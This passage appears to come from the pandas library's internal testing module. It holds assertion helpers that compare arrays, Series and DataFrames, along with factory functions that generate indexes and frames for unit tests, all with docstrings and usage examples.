Test that two IntervalArrays are equivalent.
Parameters
----------
left, right : IntervalArray
The IntervalArrays to compare.
exact : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
obj : str, default 'IntervalArray'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, IntervalArray)
assert_index_equal(left.left, right.left, exact=exact, obj=f"{obj}.left")
assert_index_equal(left.right, right.right, exact=exact, obj=f"{obj}.left")
assert_attr_equal("closed", left, right, obj=obj)
def assert_period_array_equal(left, right, obj="PeriodArray"):
_check_isinstance(left, right, PeriodArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
assert_attr_equal("freq", left, right, obj=obj)
def assert_datetime_array_equal(left, right, obj="DatetimeArray"):
__tracebackhide__ = True
_check_isinstance(left, right, DatetimeArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
assert_attr_equal("freq", left, right, obj=obj)
assert_attr_equal("tz", left, right, obj=obj)
def assert_timedelta_array_equal(left, right, obj="TimedeltaArray"):
__tracebackhide__ = True
_check_isinstance(left, right, TimedeltaArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
assert_attr_equal("freq", left, right, obj=obj)
def raise_assert_detail(obj, message, left, right, diff=None, index_values=None):
__tracebackhide__ = True
msg = f"""{obj} are different
{message}"""
if isinstance(index_values, np.ndarray):
msg += f"\n[index]: {pprint_thing(index_values)}"
if isinstance(left, np.ndarray):
left = pprint_thing(left)
elif is_categorical_dtype(left):
left = repr(left)
if isinstance(right, np.ndarray):
right = pprint_thing(right)
elif is_categorical_dtype(right):
right = repr(right)
msg += f"""
[left]: {left}
[right]: {right}"""
if diff is not None:
msg += f"\n[diff]: {diff}"
raise AssertionError(msg)
def assert_numpy_array_equal(
left,
right,
strict_nan=False,
check_dtype=True,
err_msg=None,
check_same=None,
obj="numpy array",
index_values=None,
):
"""
Check that 'np.ndarray' is equivalent.
Parameters
----------
left, right : numpy.ndarray or iterable
The two arrays to be compared.
strict_nan : bool, default False
If True, consider NaN and None to be different.
check_dtype : bool, default True
Check dtype if both a and b are np.ndarray.
err_msg : str, default None
If provided, used as assertion message.
check_same : None|'copy'|'same', default None
Ensure left and right refer/do not refer to the same memory area.
obj : str, default 'numpy array'
Specify object name being compared, internally used to show appropriate
assertion message.
index_values : numpy.ndarray, default None
optional index (shared by both left and right), used in output.
"""
__tracebackhide__ = True
# instance validation
# Show a detailed error message when classes are different
assert_class_equal(left, right, obj=obj)
# both classes must be an np.ndarray
_check_isinstance(left, right, np.ndarray)
def _get_base(obj):
return obj.base if getattr(obj, "base", None) is not None else obj
left_base = _get_base(left)
right_base = _get_base(right)
if check_same == "same":
if left_base is not right_base:
raise AssertionError(f"{repr(left_base)} is not {repr(right_base)}")
elif check_same == "copy":
if left_base is right_base:
raise AssertionError(f"{repr(left_base)} is {repr(right_base)}")
def _raise(left, right, err_msg):
if err_msg is None:
if left.shape != right.shape:
raise_assert_detail(
obj, f"{obj} shapes are different", left.shape, right.shape,
)
diff = 0
for l, r in zip(left, right):
# count up differences
if not array_equivalent(l, r, strict_nan=strict_nan):
diff += 1
diff = diff * 100.0 / left.size
msg = f"{obj} values are different ({np.round(diff, 5)} %)"
raise_assert_detail(obj, msg, left, right, index_values=index_values)
raise AssertionError(err_msg)
# compare shape and values
if not array_equivalent(left, right, strict_nan=strict_nan):
_raise(left, right, err_msg)
if check_dtype:
if isinstance(left, np.ndarray) and isinstance(right, np.ndarray):
assert_attr_equal("dtype", left, right, obj=obj)
def assert_extension_array_equal(
left,
right,
check_dtype=True,
index_values=None,
check_less_precise=no_default,
check_exact=False,
rtol: float = 1.0e-5,
atol: float = 1.0e-8,
):
"""
Check that left and right ExtensionArrays are equal.
Parameters
----------
left, right : ExtensionArray
The two arrays to compare.
check_dtype : bool, default True
Whether to check if the ExtensionArray dtypes are identical.
index_values : numpy.ndarray, default None
Optional index (shared by both left and right), used in output.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_exact : bool, default False
Whether to compare number exactly.
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
Notes
-----
Missing values are checked separately from valid values.
A mask of missing values is computed for each and checked to match.
The remaining all-valid values are cast to object dtype and checked.
"""
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
assert isinstance(left, ExtensionArray), "left is not an ExtensionArray"
assert isinstance(right, ExtensionArray), "right is not an ExtensionArray"
if check_dtype:
assert_attr_equal("dtype", left, right, obj="ExtensionArray")
if (
isinstance(left, DatetimeLikeArrayMixin)
and isinstance(right, DatetimeLikeArrayMixin)
and type(right) == type(left)
):
# Avoid slow object-dtype comparisons
# np.asarray for case where we have a np.MaskedArray
assert_numpy_array_equal(
np.asarray(left.asi8), np.asarray(right.asi8), index_values=index_values
)
return
left_na = np.asarray(left.isna())
right_na = np.asarray(right.isna())
assert_numpy_array_equal(
left_na, right_na, obj="ExtensionArray NA mask", index_values=index_values
)
left_valid = np.asarray(left[~left_na].astype(object))
right_valid = np.asarray(right[~right_na].astype(object))
if check_exact:
assert_numpy_array_equal(
left_valid, right_valid, obj="ExtensionArray", index_values=index_values
)
else:
_testing.assert_almost_equal(
left_valid,
right_valid,
check_dtype=check_dtype,
rtol=rtol,
atol=atol,
obj="ExtensionArray",
index_values=index_values,
)
# This could be refactored to use the NDFrame.equals method
def assert_series_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_series_type=True,
check_less_precise=no_default,
check_names=True,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
check_category_order=True,
check_freq=True,
rtol=1.0e-5,
atol=1.0e-8,
obj="Series",
):
"""
Check that left and right Series are equal.
Parameters
----------
left : Series
right : Series
check_dtype : bool, default True
Whether to check the Series dtype is identical.
check_index_type : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_series_type : bool, default True
Whether to check the Series class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_names : bool, default True
Whether to check the Series and Index names attribute.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_category_order : bool, default True
Whether to compare category order of internal Categoricals.
.. versionadded:: 1.0.2
check_freq : bool, default True
Whether to check the `freq` attribute on a DatetimeIndex or TimedeltaIndex.
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
obj : str, default 'Series'
Specify object name being compared, internally used to show appropriate
assertion message.
"""
__tracebackhide__ = True
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
# instance validation
_check_isinstance(left, right, Series)
if check_series_type:
assert_class_equal(left, right, obj=obj)
# length comparison
if len(left) != len(right):
msg1 = f"{len(left)}, {left.index}"
msg2 = f"{len(right)}, {right.index}"
raise_assert_detail(obj, "Series length are different", msg1, msg2)
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_exact=check_exact,
check_categorical=check_categorical,
rtol=rtol,
atol=atol,
obj=f"{obj}.index",
)
if check_freq and isinstance(left.index, (pd.DatetimeIndex, pd.TimedeltaIndex)):
lidx = left.index
ridx = right.index
assert lidx.freq == ridx.freq, (lidx.freq, ridx.freq)
if check_dtype:
# We want to skip exact dtype checking when `check_categorical`
# is False. We'll still raise if only one is a `Categorical`,
# regardless of `check_categorical`
if (
is_categorical_dtype(left.dtype)
and is_categorical_dtype(right.dtype)
and not check_categorical
):
pass
else:
assert_attr_equal("dtype", left, right, obj=f"Attributes of {obj}")
if check_exact:
if not is_numeric_dtype(left.dtype):
raise AssertionError("check_exact may only be used with numeric Series")
assert_numpy_array_equal(
left._values,
right._values,
check_dtype=check_dtype,
obj=str(obj),
index_values=np.asarray(left.index),
)
elif check_datetimelike_compat and (
needs_i8_conversion(left.dtype) or needs_i8_conversion(right.dtype)
):
# we want to check only if we have compat dtypes
# e.g. integer and M|m are NOT compat, but we can simply check
# the values in that case
# datetimelike may have different objects (e.g. datetime.datetime
# vs Timestamp) but will compare equal
if not Index(left._values).equals(Index(right._values)):
msg = (
f"[datetimelike_compat=True] {left._values} "
f"is not equal to {right._values}."
)
raise AssertionError(msg)
elif is_interval_dtype(left.dtype) and is_interval_dtype(right.dtype):
assert_interval_array_equal(left.array, right.array)
elif is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
_testing.assert_almost_equal(
left._values,
right._values,
rtol=rtol,
atol=atol,
check_dtype=check_dtype,
obj=str(obj),
index_values=np.asarray(left.index),
)
elif is_extension_array_dtype(left.dtype) and is_extension_array_dtype(right.dtype):
assert_extension_array_equal(
left._values, right._values, index_values=np.asarray(left.index)
)
elif needs_i8_conversion(left.dtype) or needs_i8_conversion(right.dtype):
# DatetimeArray or TimedeltaArray
assert_extension_array_equal(
left._values, right._values, index_values=np.asarray(left.index)
)
else:
_testing.assert_almost_equal(
left._values,
right._values,
rtol=rtol,
atol=atol,
check_dtype=check_dtype,
obj=str(obj),
index_values=np.asarray(left.index),
)
# metadata comparison
if check_names:
assert_attr_equal("name", left, right, obj=obj)
if check_categorical:
if is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
assert_categorical_equal(
left._values,
right._values,
obj=f"{obj} category",
check_category_order=check_category_order,
)
# This could be refactored to use the NDFrame.equals method
def assert_frame_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_column_type="equiv",
check_frame_type=True,
check_less_precise=no_default,
check_names=True,
by_blocks=False,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
check_like=False,
check_freq=True,
rtol=1.0e-5,
atol=1.0e-8,
obj="DataFrame",
):
"""
Check that left and right DataFrame are equal.
This function is intended to compare two DataFrames and output any
differences. Is is mostly intended for use in unit tests.
Additional parameters allow varying the strictness of the
equality checks performed.
Parameters
----------
left : DataFrame
First DataFrame to compare.
right : DataFrame
Second DataFrame to compare.
check_dtype : bool, default True
Whether to check the DataFrame dtype is identical.
check_index_type : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_column_type : bool or {'equiv'}, default 'equiv'
Whether to check the columns class, dtype and inferred_type
are identical. Is passed as the ``exact`` argument of
:func:`assert_index_equal`.
check_frame_type : bool, default True
Whether to check the DataFrame class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_names : bool, default True
Whether to check that the `names` attribute for both the `index`
and `column` attributes of the DataFrame is identical.
by_blocks : bool, default False
Specify how to compare internal data. If False, compare by columns.
If True, compare by blocks.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_like : bool, default False
If True, ignore the order of index & columns.
Note: index labels must match their respective rows
(same as in columns) - same labels must be with the same data.
check_freq : bool, default True
Whether to check the `freq` attribute on a DatetimeIndex or TimedeltaIndex.
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
obj : str, default 'DataFrame'
Specify object name being compared, internally used to show appropriate
assertion message.
See Also
--------
assert_series_equal : Equivalent method for asserting Series equality.
DataFrame.equals : Check DataFrame equality.
Examples
--------
This example shows comparing two DataFrames that are equal
but with columns of differing dtypes.
>>> from pandas._testing import assert_frame_equal
>>> df1 = pd.DataFrame({'a': [1, 2], 'b': [3, 4]})
>>> df2 = pd.DataFrame({'a': [1, 2], 'b': [3.0, 4.0]})
df1 equals itself.
>>> assert_frame_equal(df1, df1)
df1 differs from df2 as column 'b' is of a different type.
>>> assert_frame_equal(df1, df2)
Traceback (most recent call last):
...
AssertionError: Attributes of DataFrame.iloc[:, 1] (column name="b") are different
Attribute "dtype" are different
[left]: int64
[right]: float64
Ignore differing dtypes in columns with check_dtype.
>>> assert_frame_equal(df1, df2, check_dtype=False)
"""
__tracebackhide__ = True
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
# instance validation
_check_isinstance(left, right, DataFrame)
if check_frame_type:
assert isinstance(left, type(right))
# assert_class_equal(left, right, obj=obj)
# shape comparison
if left.shape != right.shape:
raise_assert_detail(
obj, f"{obj} shape mismatch", f"{repr(left.shape)}", f"{repr(right.shape)}",
)
if check_like:
left, right = left.reindex_like(right), right
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_exact=check_exact,
check_categorical=check_categorical,
rtol=rtol,
atol=atol,
obj=f"{obj}.index",
)
# column comparison
assert_index_equal(
left.columns,
right.columns,
exact=check_column_type,
check_names=check_names,
check_exact=check_exact,
check_categorical=check_categorical,
rtol=rtol,
atol=atol,
obj=f"{obj}.columns",
)
# compare by blocks
if by_blocks:
rblocks = right._to_dict_of_blocks()
lblocks = left._to_dict_of_blocks()
for dtype in list(set(list(lblocks.keys()) + list(rblocks.keys()))):
assert dtype in lblocks
assert dtype in rblocks
assert_frame_equal(
lblocks[dtype], rblocks[dtype], check_dtype=check_dtype, obj=obj
)
# compare by columns
else:
for i, col in enumerate(left.columns):
assert col in right
lcol = left.iloc[:, i]
rcol = right.iloc[:, i]
assert_series_equal(
lcol,
rcol,
check_dtype=check_dtype,
check_index_type=check_index_type,
check_exact=check_exact,
check_names=check_names,
check_datetimelike_compat=check_datetimelike_compat,
check_categorical=check_categorical,
check_freq=check_freq,
obj=f'{obj}.iloc[:, {i}] (column name="{col}")',
rtol=rtol,
atol=atol,
)
def assert_equal(left, right, **kwargs):
"""
Wrapper for tm.assert_*_equal to dispatch to the appropriate test function.
Parameters
----------
left, right : Index, Series, DataFrame, ExtensionArray, or np.ndarray
The two items to be compared.
**kwargs
All keyword arguments are passed through to the underlying assert method.
"""
__tracebackhide__ = True
if isinstance(left, pd.Index):
assert_index_equal(left, right, **kwargs)
if isinstance(left, (pd.DatetimeIndex, pd.TimedeltaIndex)):
assert left.freq == right.freq, (left.freq, right.freq)
elif isinstance(left, pd.Series):
assert_series_equal(left, right, **kwargs)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(left, right, **kwargs)
elif isinstance(left, IntervalArray):
assert_interval_array_equal(left, right, **kwargs)
elif isinstance(left, PeriodArray):
assert_period_array_equal(left, right, **kwargs)
elif isinstance(left, DatetimeArray):
assert_datetime_array_equal(left, right, **kwargs)
elif isinstance(left, TimedeltaArray):
assert_timedelta_array_equal(left, right, **kwargs)
elif isinstance(left, ExtensionArray):
assert_extension_array_equal(left, right, **kwargs)
elif isinstance(left, np.ndarray):
assert_numpy_array_equal(left, right, **kwargs)
elif isinstance(left, str):
assert kwargs == {}
assert left == right
else:
raise NotImplementedError(type(left))
def box_expected(expected, box_cls, transpose=True):
"""
Helper function to wrap the expected output of a test in a given box_class.
Parameters
----------
expected : np.ndarray, Index, Series
box_cls : {Index, Series, DataFrame}
Returns
-------
subclass of box_cls
"""
if box_cls is pd.array:
expected = pd.array(expected)
elif box_cls is pd.Index:
expected = pd.Index(expected)
elif box_cls is pd.Series:
expected = pd.Series(expected)
elif box_cls is pd.DataFrame:
expected = pd.Series(expected).to_frame()
if transpose:
# for vector operations, we we need a DataFrame to be a single-row,
# not a single-column, in order to operate against non-DataFrame
# vectors of the same length.
expected = expected.T
elif box_cls is PeriodArray:
# the PeriodArray constructor is not as flexible as period_array
expected = period_array(expected)
elif box_cls is DatetimeArray:
expected = DatetimeArray(expected)
elif box_cls is TimedeltaArray:
expected = TimedeltaArray(expected)
elif box_cls is np.ndarray:
expected = np.array(expected)
elif box_cls is to_array:
expected = to_array(expected)
else:
raise NotImplementedError(box_cls)
return expected
def to_array(obj):
# temporary implementation until we get pd.array in place
dtype = getattr(obj, "dtype", None)
if is_period_dtype(dtype):
return period_array(obj)
elif is_datetime64_dtype(dtype) or is_datetime64tz_dtype(dtype):
return DatetimeArray._from_sequence(obj)
elif is_timedelta64_dtype(dtype):
return TimedeltaArray._from_sequence(obj)
else:
return np.array(obj)
# -----------------------------------------------------------------------------
# Sparse
def assert_sp_array_equal(left, right):
"""
Check that the left and right SparseArray are equal.
Parameters
----------
left : SparseArray
right : SparseArray
"""
_check_isinstance(left, right, pd.arrays.SparseArray)
assert_numpy_array_equal(left.sp_values, right.sp_values)
# SparseIndex comparison
assert isinstance(left.sp_index, pd._libs.sparse.SparseIndex)
assert isinstance(right.sp_index, pd._libs.sparse.SparseIndex)
left_index = left.sp_index
right_index = right.sp_index
if not left_index.equals(right_index):
raise_assert_detail(
"SparseArray.index", "index are not equal", left_index, right_index
)
else:
# Just ensure a
pass
assert_attr_equal("fill_value", left, right)
assert_attr_equal("dtype", left, right)
assert_numpy_array_equal(left.to_dense(), right.to_dense())
# -----------------------------------------------------------------------------
# Others
def assert_contains_all(iterable, dic):
for k in iterable:
assert k in dic, f"Did not contain item: {repr(k)}"
def assert_copy(iter1, iter2, **eql_kwargs):
"""
iter1, iter2: iterables that produce elements
comparable with assert_almost_equal
Checks that the elements are equal, but not
the same object. (Does not check that items
in sequences are also not the same object)
"""
for elem1, elem2 in zip(iter1, iter2):
assert_almost_equal(elem1, elem2, **eql_kwargs)
msg = (
f"Expected object {repr(type(elem1))} and object {repr(type(elem2))} to be "
"different objects, but they were the same object."
)
assert elem1 is not elem2, msg
def getCols(k):
return string.ascii_uppercase[:k]
# make index
def makeStringIndex(k=10, name=None):
return Index(rands_array(nchars=10, size=k), name=name)
def makeUnicodeIndex(k=10, name=None):
return Index(randu_array(nchars=10, size=k), name=name)
def makeCategoricalIndex(k=10, n=3, name=None, **kwargs):
""" make a length k index or n categories """
x = rands_array(nchars=4, size=n)
return CategoricalIndex(
Categorical.from_codes(np.arange(k) % n, categories=x), name=name, **kwargs
)
def makeIntervalIndex(k=10, name=None, **kwargs):
""" make a length k IntervalIndex """
x = np.linspace(0, 100, num=(k + 1))
return IntervalIndex.from_breaks(x, name=name, **kwargs)
def makeBoolIndex(k=10, name=None):
if k == 1:
return Index([True], name=name)
elif k == 2:
return Index([False, True], name=name)
return Index([False, True] + [False] * (k - 2), name=name)
def makeIntIndex(k=10, name=None):
return Index(list(range(k)), name=name)
def makeUIntIndex(k=10, name=None):
return Index([2 ** 63 + i for i in range(k)], name=name)
def makeRangeIndex(k=10, name=None, **kwargs):
return RangeIndex(0, k, 1, name=name, **kwargs)
def makeFloatIndex(k=10, name=None):
values = sorted(np.random.random_sample(k)) - np.random.random_sample(1)
return Index(values * (10 ** np.random.randint(0, 9)), name=name)
def makeDateIndex(k=10, freq="B", name=None, **kwargs):
dt = datetime(2000, 1, 1)
dr = bdate_range(dt, periods=k, freq=freq, name=name)
return DatetimeIndex(dr, name=name, **kwargs)
def makeTimedeltaIndex(k=10, freq="D", name=None, **kwargs):
return pd.timedelta_range(start="1 day", periods=k, freq=freq, name=name, **kwargs)
def makePeriodIndex(k=10, name=None, **kwargs):
dt = datetime(2000, 1, 1)
dr = pd.period_range(start=dt, periods=k, freq="B", name=name, **kwargs)
return dr
def makeMultiIndex(k=10, names=None, **kwargs):
return MultiIndex.from_product((("foo", "bar"), (1, 2)), names=names, **kwargs)
_names = [
"Alice",
"Bob",
"Charlie",
"Dan",
"Edith",
"Frank",
"George",
"Hannah",
"Ingrid",
"Jerry",
"Kevin",
"Laura",
"Michael",
"Norbert",
"Oliver",
"Patricia",
"Quinn",
"Ray",
"Sarah",
"Tim",
"Ursula",
"Victor",
"Wendy",
"Xavier",
"Yvonne",
"Zelda",
]
def _make_timeseries(start="2000-01-01", end="2000-12-31", freq="1D", seed=None):
"""
Make a DataFrame with a DatetimeIndex
Parameters
----------
start : str or Timestamp, default "2000-01-01"
The start of the index. Passed to date_range with `freq`.
end : str or Timestamp, default "2000-12-31"
The end of the index. Passed to date_range with `freq`.
freq : str or Freq
The frequency to use for the DatetimeIndex
seed : int, optional
The random state seed.
* name : object dtype with string names
* id : int dtype with
* x, y : float dtype
Examples
--------
>>> _make_timeseries()
id name x y
timestamp
2000-01-01 982 Frank 0.031261 0.986727
2000-01-02 1025 Edith -0.086358 -0.032920
2000-01-03 982 Edith 0.473177 0.298654
2000-01-04 1009 Sarah 0.534344 -0.750377
2000-01-05 963 Zelda -0.271573 0.054424
... ... ... ... ...
2000-12-27 980 Ingrid -0.132333 -0.422195
2000-12-28 972 Frank -0.376007 -0.298687
2000-12-29 1009 Ursula -0.865047 -0.503133
2000-12-30 1000 Hannah -0.063757 -0.507336
2000-12-31 972 Tim -0.869120 0.531685
"""
index = pd.date_range(start=start, end=end, freq=freq, name="timestamp")
n = len(index)
state = np.random.RandomState(seed)
columns = {
"name": state.choice(_names, size=n),
"id": state.poisson(1000, size=n),
"x": state.rand(n) * 2 - 1,
"y": state.rand(n) * 2 - 1,
}
df = pd.DataFrame(columns, index=index, columns=sorted(columns))
if df.index[-1] == end:
df = df.iloc[:-1]
return df
def index_subclass_makers_generator():
make_index_funcs = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
makeRangeIndex,
makeIntervalIndex,
makeCategoricalIndex,
makeMultiIndex,
]
for make_index_func in make_index_funcs:
yield make_index_func
def all_timeseries_index_generator(k=10):
"""
Generator which can be iterated over to get instances of all the classes
which represent time-series.
Parameters
----------
k: length of each of the index instances
"""
make_index_funcs = [makeDateIndex, makePeriodIndex, makeTimedeltaIndex]
for make_index_func in make_index_funcs:
yield make_index_func(k=k)
# make series
def makeFloatSeries(name=None):
index = makeStringIndex(_N)
return Series(randn(_N), index=index, name=name)
def makeStringSeries(name=None):
index = makeStringIndex(_N)
return Series(randn(_N), index=index, name=name)
def makeObjectSeries(name=None):
data = makeStringIndex(_N)
data = Index(data, dtype=object)
index = makeStringIndex(_N)
return Series(data, index=index, name=name)
def getSeriesData():
index = makeStringIndex(_N)
return {c: Series(randn(_N), index=index) for c in getCols(_K)}
def makeTimeSeries(nper=None, freq="B", name=None):
if nper is None:
nper = _N
return Series(randn(nper), index=makeDateIndex(nper, freq=freq), name=name)
def makePeriodSeries(nper=None, name=None):
if nper is None:
nper = _N
return Series(randn(nper), index=makePeriodIndex(nper), name=name)
def getTimeSeriesData(nper=None, freq="B"):
return {c: makeTimeSeries(nper, freq) for c in getCols(_K)}
def getPeriodData(nper=None):
return {c: makePeriodSeries(nper) for c in getCols(_K)}
# make frame
def makeTimeDataFrame(nper=None, freq="B"):
data = getTimeSeriesData(nper, freq)
return DataFrame(data)
def makeDataFrame():
data = getSeriesData()
return DataFrame(data)
def getMixedTypeDict():
index = Index(["a", "b", "c", "d", "e"])
data = {
"A": [0.0, 1.0, 2.0, 3.0, 4.0],
"B": [0.0, 1.0, 0.0, 1.0, 0.0],
"C": ["foo1", "foo2", "foo3", "foo4", "foo5"],
"D": bdate_range("1/1/2009", periods=5),
}
return index, data
def makeMixedDataFrame():
return DataFrame(getMixedTypeDict()[1])
def makePeriodFrame(nper=None):
data = getPeriodData(nper)
return DataFrame(data)
def makeCustomIndex(
nentries, nlevels, prefix="#", names=False, ndupe_l=None, idx_type=None
):
"""
Create an index/multindex with given dimensions, levels, names, etc'
nentries - number of entries in index
nlevels - number of levels (> 1 produces multindex)
prefix - a string prefix for labels
names - (Optional), bool or list of strings. if True will use default
names, if false will use no names, if a list is given, the name of
each level in the index will be taken from the list.
ndupe_l - (Optional), list of ints, the number of rows for which the
label will repeated at the corresponding level, you can specify just
the first few, the rest will use the default ndupe_l of 1.
len(ndupe_l) <= nlevels.
idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a datetime index.
if unspecified, string labels will be generated.
"""
if ndupe_l is None:
ndupe_l = [1] * nlevels
assert is_sequence(ndupe_l) and len(ndupe_l) <= nlevels
assert names is None or names is False or names is True or len(names) is nlevels
assert idx_type is None or (
idx_type in ("i", "f", "s", "u", "dt", "p", "td") and nlevels == 1
)
if names is True:
# build default names
names = [prefix + str(i) for i in range(nlevels)]
if names is False:
# pass None to index constructor for no name
names = None
# make singleton case uniform
if isinstance(names, str) and nlevels == 1:
names = [names]
# specific 1D index type requested?
idx_func = dict(
i=makeIntIndex,
f=makeFloatIndex,
s=makeStringIndex,
u=makeUnicodeIndex,
dt=makeDateIndex,
td=makeTimedeltaIndex,
p=makePeriodIndex,
).get(idx_type)
if idx_func:
idx = idx_func(nentries)
# but we need to fill in the name
if names:
idx.name = names[0]
return idx
elif idx_type is not None:
raise ValueError(
f"{repr(idx_type)} is not a legal value for `idx_type`, "
"use 'i'/'f'/'s'/'u'/'dt'/'p'/'td'."
)
if len(ndupe_l) < nlevels:
ndupe_l.extend([1] * (nlevels - len(ndupe_l)))
assert len(ndupe_l) == nlevels
assert all(x > 0 for x in ndupe_l)
tuples = []
for i in range(nlevels):
def keyfunc(x):
import re
numeric_tuple = re.sub(r"[^\d_]_?", "", x).split("_")
return [int(num) for num in numeric_tuple]
# build a list of lists to create the index from
div_factor = nentries // ndupe_l[i] + 1
cnt = Counter()
for j in range(div_factor):
label = f"{prefix}_l{i}_g{j}"
cnt[label] = ndupe_l[i]
# cute Counter trick
result = sorted(cnt.elements(), key=keyfunc)[:nentries]
tuples.append(result)
tuples = list(zip(*tuples))
# convert tuples to index
if nentries == 1:
# we have a single level of tuples, i.e. a regular Index
index = Index(tuples[0], name=names[0])
elif nlevels == 1:
name = None if names is None else names[0]
index = Index((x[0] for x in tuples), name=name)
else:
index = MultiIndex.from_tuples(tuples, names=names)
return index
def makeCustomDataframe(
nrows,
ncols,
c_idx_names=True,
r_idx_names=True,
c_idx_nlevels=1,
r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None,
r_ndupe_l=None,
dtype=None,
c_idx_type=None,
r_idx_type=None,
):
"""
Create a DataFrame using supplied parameters.
Parameters
----------
nrows, ncols - number of data rows/cols
c_idx_names, idx_names - False/True/list of strings, yields No names ,
default names or uses the provided names for the levels of the
corresponding index. You can provide a single string when
c_idx_nlevels ==1.
c_idx_nlevels - number of levels in columns index. > 1 will yield MultiIndex
r_idx_nlevels - number of levels in rows index. > 1 will yield MultiIndex
data_gen_f - a function f(row,col) which return the data value
at that position, the default generator used yields values of the form
"RxCy" based on position.
c_ndupe_l, r_ndupe_l - list of integers, determines the number
of duplicates for each label at a given level of the corresponding
index. The default `None` value produces a multiplicity of 1 across
all levels, i.e. a unique index. Will accept a partial list of length
N < idx_nlevels, for just the first N levels. If ndupe doesn't divide
nrows/ncol, the last label might have lower multiplicity.
dtype - passed to the DataFrame constructor as is, in case you wish to
have more control in conjunction with a custom `data_gen_f`
r_idx_type, c_idx_type - "i"/"f"/"s"/"u"/"dt"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a timedelta index.
if unspecified, string labels will be generated.
Examples
--------
# 5 row, 3 columns, default names on both, single index on both axis
>> makeCustomDataframe(5,3)
# make the data a random int between 1 and 100
>> mkdf(5,3,data_gen_f=lambda r,c:randint(1,100))
# 2-level multiindex on rows with each label duplicated
# twice on first level, default names on both axis, single
# index on both axis
>> a=makeCustomDataframe(5,3,r_idx_nlevels=2,r_ndupe_l=[2])
# DatetimeIndex on row, index with unicode labels on columns
# no names on either axis
>> a=makeCustomDataframe(5,3,c_idx_names=False,r_idx_names=False,
r_idx_type="dt",c_idx_type="u")
# 4-level multindex on rows with names provided, 2-level multindex
# on columns with default labels and default names.
>> a=makeCustomDataframe(5,3,r_idx_nlevels=4,
r_idx_names=["FEE","FI","FO","FAM"],
c_idx_nlevels=2)
>> a=mkdf(5,3,r_idx_nlevels=2,c_idx_nlevels=4)
"""
